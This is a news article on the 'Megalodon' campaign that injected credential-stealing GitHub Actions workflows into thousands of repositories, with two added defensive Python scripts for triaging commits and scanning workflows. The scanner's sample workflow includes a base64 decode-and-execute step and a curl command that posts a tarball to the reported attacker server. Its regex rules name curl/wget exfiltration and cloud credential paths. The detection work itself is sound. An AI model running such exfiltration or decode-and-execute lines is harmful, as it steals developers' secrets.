Massive GitHub Repository Breach Exposes 5,561 Accounts to Malware Risk


Security Firm Discovers Massive Automated Attack on GitHub Repositories

In a significant breach, cybersecurity firm SafeDep recently identified a massive automated attack on GitHub, impacting 5,561 repositories. Dubbed “Megalodon,” the campaign targeted the software platform within a six-hour window on May 18, 2026, pushing a total of 5,718 fake code updates.

The Attackers’ Strategy

  • The attackers used fake GitHub accounts with randomly generated eight-character names to hide their identities.
  • They further covered their tracks by setting the commit author identity to resemble legitimate automation, using sender names such as build-bot, auto-ci, ci-bot, and pipeline-bot.
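The spoofed automation identities described above are easy to miss in a busy commit feed. As an added example (not code from the original article or from SafeDep), the script below parses output in the shape of `git log --format='%H|%an|%ae|%aI' --name-only` and flags commits inside a chosen time window whose author looks like an automation account that is not on an allowlist, or that touch GitHub Actions workflow files. The log text, hashes, names, addresses and the allowlist are constructed for the example.

```python
import re
from datetime import datetime, timezone

# Constructed sample of `git log --format='%H|%an|%ae|%aI' --name-only` output.
# Hashes, names and e-mail addresses are made up for this example.
SAMPLE_LOG = """\
a1b2c3d4e5f6|build-bot|build-bot@users.noreply.github.com|2026-05-18T14:02:11+00:00

.github/workflows/ci.yml

0f1e2d3c4b5a|Alice Dev|alice@example.com|2026-05-17T09:15:00+00:00

src/app.js
README.md

99887766aabb|dependabot[bot]|dependabot[bot]@users.noreply.github.com|2026-05-18T11:00:00+00:00

package.json

c0ffee123456|ci-bot|ci-bot@users.noreply.github.com|2026-05-18T16:40:00+00:00

scripts/build.sh
"""

# Identities named in the article, plus a generic "looks like a bot" pattern.
SPOOFED_BOT_NAMES = {"build-bot", "auto-ci", "ci-bot", "pipeline-bot"}
GENERIC_BOT = re.compile(r"(^|[-_ ])(bot|ci)$", re.IGNORECASE)

# Example allowlist of automation identities a project genuinely uses
# (an assumption for this example; each project maintains its own list).
KNOWN_AUTOMATION = {"dependabot[bot]", "github-actions[bot]"}

# Review window for the campaign day (UTC), as reported in the article.
WINDOW_START = datetime(2026, 5, 18, 0, 0, 0, tzinfo=timezone.utc)
WINDOW_END = datetime(2026, 5, 18, 23, 59, 59, tzinfo=timezone.utc)


def parse_log(text):
    """Turn the piped log format into a list of commit dicts with file lists."""
    commits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split("|")
        if len(parts) == 4:
            sha, name, email, when = parts
            commits.append({"sha": sha, "author": name, "email": email,
                            "when": datetime.fromisoformat(when), "files": []})
        elif commits:
            commits[-1]["files"].append(line.strip())
    return commits


def triage(text, window_start=WINDOW_START, window_end=WINDOW_END,
           allowlist=KNOWN_AUTOMATION):
    """Flag commits in the window from unallowlisted bot-like authors or
    commits that change workflow files. Both together rank 'high'."""
    flagged = []
    for c in parse_log(text):
        if not (window_start <= c["when"] <= window_end):
            continue
        reasons = []
        bot_like = c["author"] in SPOOFED_BOT_NAMES or GENERIC_BOT.search(c["author"])
        if bot_like and c["author"] not in allowlist:
            reasons.append("automation-like author identity not in allowlist")
        if any(f.startswith(".github/workflows/") for f in c["files"]):
            reasons.append("modifies a GitHub Actions workflow file")
        if reasons:
            flagged.append({"sha": c["sha"], "author": c["author"],
                            "severity": "high" if len(reasons) == 2 else "medium",
                            "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit["severity"], hit["sha"], hit["author"], "; ".join(hit["reasons"]))
```

Run it against real output by piping `git log` into the script in place of `SAMPLE_LOG`; commits that rank "high" are the ones to inspect and revert first, then treat any credentials reachable from that repository's workflows as exposed.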

Concurrent Hacking Attempt by TeamPCP

The incident occurred concurrently with another hacking attempt by TeamPCP, which compromised a GitHub employee’s device and breached 3,800 repositories through a malicious Visual Studio Code (VS Code) extension.

According to SafeDep's analysis, the attackers used two main automated injection techniques:

  • SysDiag adds a new file named “.github/workflows/ci.yml” that runs a data-stealing script whenever a developer pushes an update to the project.
  • Optimize-Build is stealthier: it overwrites existing files and uses the “workflow_dispatch” trigger so that the malicious code stays dormant until it is invoked.
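A reviewer looking at a surprise change to a workflow file wants a quick read on whether it carries the traits described here: a push or manual trigger, a step that decodes and executes hidden content, outbound traffic to a bare IP and port, and (relevant to the token-theft concern later in the article) a permission that lets the job mint identity tokens. The following is an added example, not SafeDep's tooling or the project's code; it scans a workflow text line by line with generic indicator rules. The sample workflow is constructed, with a placeholder where a payload would sit; the server address is the one reported in the article.

```python
import re

# Constructed sample workflow in the shape the article describes: a new
# .github/workflows/ci.yml that fires on push and decodes a hidden script.
# The payload is a placeholder, not real content.
SAMPLE_WORKFLOW = """\
name: CI
on:
  push:
  workflow_dispatch:
permissions:
  id-token: write
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Optimize build
        run: |
          echo "<base64-blob-placeholder>" | base64 -d | bash
      - name: Upload diagnostics
        run: curl -s -X POST --data-binary @/tmp/diag.tar.gz https://216.126.225.129:8443/
"""

# Each rule: (name, severity, compiled regex). These are generic indicators
# for reviewing workflow changes, not signatures of one specific campaign.
RULES = [
    # decoded content piped straight into a shell
    ("decode-and-execute", "high",
     re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b")),
    # curl/wget to a literal IP address (optionally with a port)
    ("raw-ip-network", "high",
     re.compile(r"\b(curl|wget)\b.*https?://\d{1,3}(\.\d{1,3}){3}(:\d+)?")),
    # job may request OIDC identity tokens for cloud federation
    ("oidc-token-write", "medium",
     re.compile(r"^\s*id-token:\s*write\s*$")),
    # direct reads of local cloud credential stores
    ("cloud-cred-paths", "medium",
     re.compile(r"(\.aws/credentials|\.config/gcloud|\.azure/)")),
    # manual trigger: code can sit dormant until someone dispatches it
    ("manual-trigger", "low",
     re.compile(r"^\s*workflow_dispatch:")),
]

SEVERITY_RANK = {"none": 0, "low": 1, "medium": 2, "high": 3}


def scan_workflow(text):
    """Return one finding per (line, rule) match, with line numbers for review."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, severity, pattern in RULES:
            if pattern.search(line):
                findings.append({"line": lineno, "rule": name,
                                 "severity": severity, "text": line.strip()})
    return findings


def max_severity(findings):
    """Highest severity among the findings, or 'none' when there are none."""
    return max((f["severity"] for f in findings),
               key=SEVERITY_RANK.get, default="none")


if __name__ == "__main__":
    hits = scan_workflow(SAMPLE_WORKFLOW)
    for h in hits:
        print(f"line {h['line']:>3} [{h['severity']:<6}] {h['rule']}: {h['text']}")
    print("overall:", max_severity(hits))
```

A single "low" hit (a manual trigger) is normal in many legitimate workflows; the combination of decode-and-execute with outbound traffic to a raw IP is what should stop a merge and prompt the revert-and-rotate response recommended later in the article.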

Tiledesk Affected

Tiledesk, a prominent live chat and chatbot service, fell prey to this attack, with the hackers compromising nine of its repositories on GitHub.

The main developer did not recognize the poisoned files and inadvertently published seven infected versions of the product, including @tiledesk/tiledesk-server (versions 2.18.6 through 2.18.12), to the public npm package registry between May 19 and 21, 2026.

Upon execution, the hidden script spawns a shell and runs a decoded 111-line background program that collects internal files and data and transmits them to a hacker-controlled Command and Control (C2) server at 216.126.225.129:8443.

The malware harvests credentials for major cloud platforms such as Amazon Web Services, Google Cloud, and Microsoft Azure, searching system logs, history files, and source code for 30 types of secrets, including passwords, database connection strings, and private keys.

SafeDep’s Warning

SafeDep warns that the most concerning consequence is that attackers can obtain the identity tokens issued to the GitHub Actions workflow and use them to impersonate it, so that linked cloud environments treat the attacker as the legitimate workflow.

SafeDep therefore advises developers who saw unusual commits on May 18 from addresses such as build-[protected] or [protected] to revert those changes and promptly rotate their cloud credentials.

Recommendations

  • Developers should monitor repository activity and swiftly address any suspicious code updates to prevent similar incidents in the future.
  • They should also ensure that their cloud accounts have up-to-date security measures in place.
